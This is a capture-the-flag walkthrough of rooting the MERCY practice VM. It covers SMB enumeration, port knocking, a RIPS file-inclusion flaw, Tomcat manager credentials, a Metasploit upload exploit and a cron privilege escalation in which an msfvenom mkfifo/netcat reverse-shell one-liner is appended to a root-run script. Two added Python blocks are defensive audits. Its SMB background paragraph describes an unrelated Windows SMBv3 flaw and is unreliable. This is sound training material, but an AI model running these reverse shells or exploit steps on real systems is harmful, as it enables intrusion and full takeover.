takudaddy 2021. 3. 19. 13:35

1. Enumeration



1-1) Port Scanning


: tomcat7




1-2) Web Enumeration

Nikto / Dirb / Wfuzz


: robots.txt





1-3) Info found through the scanning process



(looks like base64)



Decoded at https://www.base64decode.org/ :

It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.

Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.

No fluffy bunnies for those who set insecure passwords and endanger the enterprise.



password : password





1-4) Finding the user list

[root@takudaddy /script]# enum4linux -a
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar 18 11:43:19 2021

|    Target Information    |
Target ...........
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

|    Enumerating Workgroup/Domain on    |
[+] Got domain/workgroup name: WORKGROUP

|    Users on    |
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: pleadformercy    Name: QIU       Desc: 
index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: qiu      Name:   Desc: 

user:[pleadformercy] rid:[0x3e8]
user:[qiu] rid:[0x3e9]

|    Share Enumeration on    |

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        qiu             Disk      
        IPC$            IPC       IPC Service (MERCY server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\pleadformercy (Local User)
S-1-22-1-1001 Unix User\qiu (Local User)
S-1-22-1-1002 Unix User\thisisasuperduperlonguser (Local User)
S-1-22-1-1003 Unix User\fluffy (Local User)



usernames :

2. Penetration



[Prerequisite knowledge] SMB vulnerability:

This vulnerability is caused by a buffer overflow in the SMB server running on TCP port 445.

It works on Windows 10 and Windows Server versions 1903 and 1909.

SMB, the protocol associated with the vulnerability, is a network protocol that enables file sharing, network browsing, printing, and inter-process communication. To exploit the vulnerability, an attacker has to set up an SMBv3 server and induce the target to connect to it. Using the flaw in SMBv3, the attacker can send crafted packets to the SMBv3 server. As a result, the attacker can remotely gain control of the system.



2-1) Logging in with smbclient

[root@takudaddy /script]# smbclient \\\\\\qiu -U pleadformercy
Enter WORKGROUP\pleadformercy's password: 
session setup failed: NT_STATUS_LOGON_FAILURE
[root@takudaddy /script]# smbclient \\\\\\qiu -U thisisasuperduperlonguser
Enter WORKGROUP\thisisasuperduperlonguser's password: 
tree connect failed: NT_STATUS_ACCESS_DENIED
[root@takudaddy /script]# smbclient \\\\\\qiu -U fluffy
Enter WORKGROUP\fluffy's password: 
tree connect failed: NT_STATUS_ACCESS_DENIED
[root@takudaddy /script]# smbclient \\\\\\qiu -U qiu
Enter WORKGROUP\qiu's password: 
Try "help" to get a list of possible commands.
smb: \> 

[root@takudaddy /script]# smbclient // -U qiu
Enter WORKGROUP\qiu's password: 
Try "help" to get a list of possible commands.
smb: \> 


2-2) Checking the available commands and downloading information

smb: \> ls
  .                                   D        0  Sat Sep  1 04:07:00 2018
  ..                                  D        0  Tue Nov 20 01:59:09 2018
  .bashrc                             H     3637  Sun Aug 26 22:19:34 2018
  .public                            DH        0  Sun Aug 26 23:23:24 2018
  .bash_history                       H      163  Sat Sep  1 04:11:34 2018
  .cache                             DH        0  Sat Sep  1 03:22:05 2018
  .private                           DH        0  Mon Aug 27 01:35:34 2018
  .bash_logout                        H      220  Sun Aug 26 22:19:34 2018
  .profile                            H      675  Sun Aug 26 22:19:34 2018

                19213004 blocks of size 1024. 16302072 blocks available
smb: \> cd .private
smb: \.private\> ls
  .                                   D        0  Mon Aug 27 01:35:34 2018
  ..                                  D        0  Sat Sep  1 04:07:00 2018
  opensesame                          D        0  Fri Aug 31 01:36:50 2018
  readme.txt                          N       94  Sun Aug 26 23:22:35 2018
  secrets                             D        0  Tue Nov 20 02:01:09 2018

                19213004 blocks of size 1024. 16302072 blocks available
smb: \.private\> get readme.txt
getting file \.private\readme.txt of size 94 as readme.txt (91.8 KiloBytes/sec) (average 91.8 KiloBytes/sec)
smb: \.private\> cd secrets\
smb: \.private\secrets\> ls
  .                                   D        0  Tue Nov 20 02:01:09 2018
  ..                                  D        0  Mon Aug 27 01:35:34 2018

                19213004 blocks of size 1024. 16302072 blocks available
smb: \.private\secrets\> cd ..
smb: \.private\> cd opensesame\
smb: \.private\opensesame\> ls
  .                                   D        0  Fri Aug 31 01:36:50 2018
  ..                                  D        0  Mon Aug 27 01:35:34 2018
  configprint                         A      539  Fri Aug 31 01:39:14 2018
  config                              N    17543  Sat Sep  1 04:11:56 2018

                19213004 blocks of size 1024. 16302072 blocks available
smb: \.private\opensesame\> get config*
NT_STATUS_OBJECT_NAME_INVALID opening remote file \.private\opensesame\config*
smb: \.private\opensesame\> get config
getting file \.private\opensesame\config of size 17543 as config (17130.2 KiloBytes/sec) (average 8611.8 KiloBytes/sec)
smb: \.private\opensesame\> get configprint
getting file \.private\opensesame\configprint of size 539 as configprint (526.3 KiloBytes/sec) (average 5916.7 KiloBytes/sec)
smb: \.private\opensesame\> cd
Current directory is \.private\opensesame\
smb: \.private\opensesame\> cd ..
smb: \.private\> cd ..
smb: \> ls
  .                                   D        0  Sat Sep  1 04:07:00 2018
  ..                                  D        0  Tue Nov 20 01:59:09 2018
  .bashrc                             H     3637  Sun Aug 26 22:19:34 2018
  .public                            DH        0  Sun Aug 26 23:23:24 2018
  .bash_history                       H      163  Sat Sep  1 04:11:34 2018
  .cache                             DH        0  Sat Sep  1 03:22:05 2018
  .private                           DH        0  Mon Aug 27 01:35:34 2018
  .bash_logout                        H      220  Sun Aug 26 22:19:34 2018
  .profile                            H      675  Sun Aug 26 22:19:34 2018

                19213004 blocks of size 1024. 16302068 blocks available
smb: \> get bash_history
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \bash_history
smb: \> get .bash_history
getting file \.bash_history of size 163 as .bash_history (159.2 KiloBytes/sec) (average 4477.3 KiloBytes/sec)
smb: \> 
smb: \> 
smb: \> 
smb: \> exit



2-3) Reviewing the downloaded information

[root@takudaddy /script]# cat config
Here are settings for your perusal.

Port Knocking Daemon Configuration


        sequence    = 159,27391,4
        seq_timeout = 100
        command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
        tcpflags    = syn

        sequence    = 4,27391,159
        seq_timeout = 100
        command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
        tcpflags    = syn

        sequence    = 17301,28504,9999
        seq_timeout = 100
        command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
        tcpflags    = syn
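The three rules above are everything the knockd configuration gives away. As an added example (not from the original post), here is a Python parser for that rule format plus a defender-side check that replays a list of observed TCP SYNs against the rules to show when a source completed a knock sequence. The SYN list is constructed; knockd's own matching is stricter (a wrong port resets the sequence), so this treats back-to-back knocks from one source within `seq_timeout` as a completion.

```python
import re
from dataclasses import dataclass
# knockd configuration exactly as recovered from the `config` file on the share
KNOCKD_CONFIG = """
        sequence    = 159,27391,4
        seq_timeout = 100
        command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
        tcpflags    = syn
        sequence    = 4,27391,159
        seq_timeout = 100
        command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
        tcpflags    = syn
        sequence    = 17301,28504,9999
        seq_timeout = 100
        command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
        tcpflags    = syn
"""
# constructed SYN observations (e.g. from a firewall log): (epoch_seconds, src_ip, dst_port)
SYNS = [(1000, "10.0.0.5", 159), (1001, "10.0.0.5", 27391), (1002, "10.0.0.5", 4),
        (2000, "10.0.0.9", 17301), (2500, "10.0.0.9", 28504), (2600, "10.0.0.9", 9999)]

@dataclass
class KnockRule:
    sequence: list      # knock ports, in order
    seq_timeout: int    # seconds allowed from first to last knock
    command: str        # what knockd runs when the sequence completes
    opens: bool         # True for `iptables -I` (open), False for `-D` (close)
    dport: int          # service port the rule opens or closes

def _build(d):
    cmd = d["command"]
    dport = int(re.search(r"--dport\s+(\d+)", cmd).group(1))
    return KnockRule([int(p) for p in d["sequence"].split(",")],
                     int(d["seq_timeout"]), cmd, " -I " in cmd, dport)

def parse_knockd(text):
    """Each `sequence =` line starts a new rule; the other keys attach to it."""
    rules, cur = [], {}
    for key, val in re.findall(r"^\s*(\w+)\s*=\s*(.+?)\s*$", text, re.M):
        if key == "sequence" and cur:
            rules.append(_build(cur))
            cur = {}
        cur[key] = val
    return rules + ([_build(cur)] if cur else [])

def detect_knocks(rules, syns):
    """Returns (src_ip, dport, 'open'|'close', completed_at) for every sequence a
    single source completes with back-to-back knocks inside seq_timeout."""
    by_src, hits = {}, []
    for ts, src, port in sorted(syns):
        by_src.setdefault(src, []).append((ts, port))
    for src, ev in by_src.items():
        for r in rules:
            n = len(r.sequence)
            for i in range(len(ev) - n + 1):
                win = ev[i:i + n]
                if [p for _, p in win] == r.sequence and win[-1][0] - win[0][0] <= r.seq_timeout:
                    hits.append((src, r.dport, "open" if r.opens else "close", win[-1][0]))
    return hits
```

With the constructed input, only 10.0.0.5 completes a sequence (port 80 opened at t=1002); 10.0.0.9 knocks the right ports but takes 600 s, beyond the 100 s timeout.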




2-4) Opening ports by knocking

[root@takudaddy /script]# knock 159 27391 4
[root@takudaddy /script]# knock 17301 28504 9999
[root@takudaddy /script]# 
[root@takudaddy /script]# nmap
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-18 13:42 KST
Nmap scan report for
Host is up (0.00018s latency).
Not shown: 990 closed ports
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
110/tcp  open  pop3
139/tcp  open  netbios-ssn
143/tcp  open  imap
445/tcp  open  microsoft-ds
993/tcp  open  imaps
995/tcp  open  pop3s
8080/tcp open  http-proxy
MAC Address: 08:00:27:B1:A5:A4 (Oracle VirtualBox virtual NIC)



2-5) Verifying access



2-6) Scanning port 80

[root@takudaddy /script]# ./webenum.sh

               Web Enumertation tool                   
                                        by takudaddy                         

[ Running ] Nikto against
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2021-03-18 13:51:35 (GMT9)
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3268: /mercy/: Directory indexing found.
+ Entry '/mercy/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.25
+ Cookie stylesheet created without the httponly flag
+ Entry '/nomercy/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Server may leak inodes via ETags, header found with file /, inode: 5a, size: 5745661f170dc, mtime: gzip
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ 7917 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2021-03-18 13:52:19 (GMT9) (44 seconds)
+ 1 host(s) tested

[ Running ] Dirb against

DIRB v2.22    
By The Dark Raver

START_TIME: Thu Mar 18 13:52:19 2021
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt


GENERATED WORDS: 4612                                                          

---- Scanning URL: ----
+ (CODE:200|SIZE:90)                                                               
+ (CODE:200|SIZE:50)                                                               
+ (CODE:403|SIZE:292)                                                           
+ (CODE:200|SIZE:79)                                                                     
END_TIME: Thu Mar 18 13:52:20 2021




2-7) digging




RIPS 0.53?


[root@takudaddy /]# searchsploit rips 0.53
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
RIPS 0.53 - Multiple Local File Inclusions    | php/webapps/18660.txt
---------------------------------------------- ---------------------------------

[root@takudaddy /mercy]# searchsploit -m php/webapps/18660.txt
  Exploit: RIPS 0.53 - Multiple Local File Inclusions
      URL: https://www.exploit-db.com/exploits/18660
     Path: /usr/share/exploitdb/exploits/php/webapps/18660.txt
File Type: ASCII text, with CRLF line terminators

Copied to: /mercy/18660.txt

[root@takudaddy /mercy]# 
[root@takudaddy /mercy]# cat 18660.txt 
# RIPS <= 0.53 Multiple Local File Inclusion Vulnerabilities
# Google Dork: allintitle: "RIPS - A static source code analyser for
vulnerabilities in PHP scripts"
# Althout this script is not intended to be accesible from internet, there
are some websites that host it.
# Download: http://sourceforge.net/projects/rips-scanner/
# Date: 23/03/12
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar

File: /windows/code.php

102: file $lines = file($file);
    96: $file = $_GET['file'];


File: /windows/function.php

    64: file $lines = file($file);
        58: $file = $_GET['file'];

read the first line of the file)[root@takudaddy /mercy]# 


LFI is possible.


At the end of the URL,


you just append it, apparently.






2-8) Finding the path of the Tomcat-related file


Connecting to port 8080 shows that

it is in /etc/tomcat7/tomcat-users.xml, apparently.


username : passwd

thisisasuperduperlonguser : heartbreakisinevitable

fluffy : freakishfluffybunny




2-9) tomcat login

Going to port 8080,

you can reach the 'manager' page.




Entering the ID and password found above,

you can log in as manager.


It looks like you can build and upload a WAR file.



Or, without creating and uploading a file,

it seems you can also connect directly with msfconsole.



# msfconsole -q

   17  exploit/multi/http/tomcat_mgr_deploy                         2009-11-09       excellent  Yes    Apache Tomcat Manager Application Deployer Authenticated Code Execution
   18  exploit/multi/http/tomcat_mgr_upload                         2009-11-09       excellent  Yes    Apache Tomcat Manager Authenticated Upload Code Execution
   19  exploit/multi/http/zenworks_configuration_management_upload  2015-04-07       excellent  Yes    Novell ZENworks Configuration Management Arbitrary File Upload
   20  exploit/windows/http/cayin_xpost_sql_rce                     2020-06-04       excellent  Yes    Cayin xPost wayfinder_seqid SQLi to RCE
   21  exploit/windows/http/tomcat_cgi_cmdlineargs                  2019-04-10       excellent  Yes    Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
   22  post/multi/gather/tomcat_gather                                               normal     No     Gather Tomcat Credentials
   23  post/windows/gather/enum_tomcat                                               normal     No     Windows Gather Apache Tomcat Enumeration                                                                                                                     

Interact with a module by name or index. For example info 23, use 23 or use post/windows/gather/enum_tomcat

msf6 > use exploit/multi/http/tomcat_mgr_upload 
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Java Universal

msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword heartbreakisinevitable
HttpPassword => heartbreakisinevitable
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername thisisasuperduperlonguser
HttpUsername => thisisasuperduperlonguser
msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS
msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > exploit

[*] Started reverse TCP handler on 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying noT8p1uinSFv...
[*] Executing noT8p1uinSFv...
[*] Undeploying noT8p1uinSFv ...
[*] Sending stage (58086 bytes) to
[*] Meterpreter session 1 opened ( -> at 2021-03-19 11:31:28 +0900

meterpreter > shell
Process 1 created.
Channel 1 created.
uid=116(tomcat7) gid=126(tomcat7) groups=126(tomcat7)
python -0^Hc ^H^H^H
Unknown option: -0
usage: python [option] ... [-c cmd | -m mod | file | -] [arg] ...
Try `python -h' for more information.
python -c 'import pty;pty.spawn("/bin/bash")'


Connected successfully.




2-10) Still, let's also practice generating a payload, uploading the file, and connecting through a listener



Generate the payload and wait in listen mode with nc

# msfvenom -p java/meterpreter/reverse_shell LHOST= LPORT=7979 -f war > attack.war

# nc -lvp 7979




2-11) Uploading the file




2-12) Start the listener and connect


Clicking the file connects (unstable)




The more involved method

# msfconsole -q

> use exploit/multi/handler

> set payload java/meterpreter/reverse_tcp

> set LHOST

> set LPORT 7979

> exploit


Clicking the uploaded file connects







3. Privilege escalation


$ cd /

$ ls -al



Switch to the fluffy user obtained above.


Finding information

fluffy@MERCY:/home$ cd fluffy
cd fluffy
fluffy@MERCY:~$ ls
fluffy@MERCY:~$ ls -al
ls -al
total 16
drwxr-x--- 3 fluffy fluffy 4096 Nov 20  2018 .
drwxr-xr-x 6 root   root   4096 Nov 20  2018 ..
-rw------- 1 fluffy fluffy   12 Nov 20  2018 .bash_history
drwxr-xr-x 3 fluffy fluffy 4096 Nov 20  2018 .private
fluffy@MERCY:~$ cat .bash_history
cat .bash_history
cd ../
fluffy@MERCY:~$ cd .private
cd .private
fluffy@MERCY:~/.private$ ls
fluffy@MERCY:~/.private$ cd secrets
cd secrets
fluffy@MERCY:~/.private/secrets$ ls -al
ls -al
total 20
drwxr-xr-x 2 fluffy fluffy 4096 Nov 20  2018 .
drwxr-xr-x 3 fluffy fluffy 4096 Nov 20  2018 ..
-rwxr-xr-x 1 fluffy fluffy   37 Nov 20  2018 backup.save
-rw-r--r-- 1 fluffy fluffy   12 Nov 20  2018 .secrets
-rwxrwxrwx 1 root   root    222 Nov 20  2018 timeclock

fluffy@MERCY:~/.private/secrets$ cat backup.save
cat backup.save

echo Backing Up Files;

fluffy@MERCY:~/.private/secrets$ cat timeclock
cat timeclock

echo "The system time is: $now." > ../../../../../var/www/html/time
echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time
chown www-data:www-data ../../../../../var/www/html/time


timeclock is a program that runs with root privileges;

it seems that if a privilege-escalation script is added to timeclock,

it gets executed after a certain amount of time.
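The timeclock finding above is the classic shape of this weakness: a script that root runs on a schedule but that any user can edit (`-rwxrwxrwx root root`). As an added example (not from the original post), here is a defender's audit in Python that walks a tree for files a privileged scheduler could run but a lower-privileged user could alter, plus the remediation that strips the write bits. The directory it checks is a constructed replica of the `.private/secrets` layout, and `trusted_uids` is a parameter of this example.

```python
import os
import stat
import tempfile

def insecure_scripts(root_dirs, trusted_uids=(0,)):
    """Return (path, mode_octal, reason) for every regular file under root_dirs
    that a root-run scheduler could execute but a lower-privileged user could
    change: writable by group/others, owned by an untrusted uid, or sitting in
    a world-writable directory without the sticky bit (so it can be replaced)."""
    findings = []
    for top in root_dirs:
        for dirpath, _dirs, files in os.walk(top):
            dmode = os.lstat(dirpath).st_mode
            dir_replaceable = bool(dmode & stat.S_IWOTH) and not (dmode & stat.S_ISVTX)
            for name in files:
                path = os.path.join(dirpath, name)
                st = os.lstat(path)
                if not stat.S_ISREG(st.st_mode):
                    continue  # skip symlinks, sockets, etc.
                mode = stat.S_IMODE(st.st_mode)
                if mode & (stat.S_IWGRP | stat.S_IWOTH):
                    findings.append((path, oct(mode), "writable by group/others"))
                elif st.st_uid not in trusted_uids:
                    findings.append((path, oct(mode), f"owned by uid {st.st_uid}"))
                elif dir_replaceable:
                    findings.append((path, oct(mode), "parent dir world-writable, no sticky bit"))
    return findings

def harden(path):
    """Remediation: strip the group/other write bits, keeping everything else."""
    mode = stat.S_IMODE(os.lstat(path).st_mode)
    os.chmod(path, mode & ~(stat.S_IWGRP | stat.S_IWOTH))
    return oct(stat.S_IMODE(os.lstat(path).st_mode))

def demo():
    """Constructed replica of the secrets directory seen on the box: a 0777
    script beside a 0755 one. Returns (findings_before, findings_after_harden),
    with paths reduced to basenames so the result is stable."""
    with tempfile.TemporaryDirectory() as d:
        secrets = os.path.join(d, ".private", "secrets")
        os.makedirs(secrets)
        for name, mode in (("timeclock", 0o777), ("backup.save", 0o755)):
            p = os.path.join(secrets, name)
            with open(p, "w") as f:
                f.write("echo placeholder\n")  # constructed stand-in content
            os.chmod(p, mode)
        me = (os.getuid(),)  # this example does not run as root, so trust our own uid
        before = insecure_scripts([d], trusted_uids=me)
        for path, _mode, _reason in before:
            harden(path)
        after = insecure_scripts([d], trusted_uids=me)
        return [(os.path.basename(p), m, r) for p, m, r in before], after

if __name__ == "__main__":
    print(demo())
```

On a real host you would point `insecure_scripts` at the cron and home directories and run it as root with the default `trusted_uids=(0,)`, so that files owned by ordinary users but referenced from root's crontab are flagged too.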




* Creating the fifo payload

[root@takudaddy ~]# msfvenom -p cmd/unix/reverse_netcat LHOST= LPORT=7979
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 102 bytes
mkfifo /tmp/rbpwxzv; nc 7979 0</tmp/rbpwxzv | /bin/sh >/tmp/rbpwxzv 2>&1; rm /tmp/rbpwxzv



After the payload is generated, the command

to be entered on the compromised server

appears at the bottom.



Copy and paste it exactly as it is,

without modifying anything.




"mkfifo /tmp/rbpwxzv; nc 7979 0</tmp/rbpwxzv | /bin/sh >/tmp/rbpwxzv 2>&1; rm /tmp/rbpwxzv" >> timeclock




Finally, open a listener on the attacking server

and wait; after a little while

the connection comes in automatically.



[root@takudaddy ~]# nc -lvp 7979
Listening on 7979
Connection received on 41858
uid=0(root) gid=0(root) groups=0(root)
python -c 'import pty;pty.spawn("/bin/bash")'

root@MERCY:~# ls
author-secret.txt  config  proof.txt
root@MERCY:~# cat author-secret.txt
cat author-secret.txt
Hi! Congratulations on being able to root MERCY.

The author feels bittersweet about this box. On one hand, it was a box designed as a dedication to the sufferance put through by the Offensive Security team for PWK. I thought I would pay it forward by creating a vulnerable machine too. This is not meant to be a particularly difficult machine, but is meant to bring you through a good number of enumerative steps through a variety of techniques.

The author would also like to thank a great friend who he always teases as "plead for mercy". She has been awesome. The author, in particular, appreciates her great heart, candour, and her willingness to listen to the author's rants and troubles. The author will stay forever grateful for her presence. She never needed to be this friendly to the author.

The author, as "plead for mercy" knows, is terrible at any sort of dedication or gifting, and so the best the author could do, I guess, is a little present, which explains the hostname of this box. (You might also have been pleading for mercy trying to root this box, considering its design.)

You'll always be remembered, "plead for mercy", and Offensive Security, for making me plead for mercy!

Congratulations, once again, for you TRIED HARDER!

The Author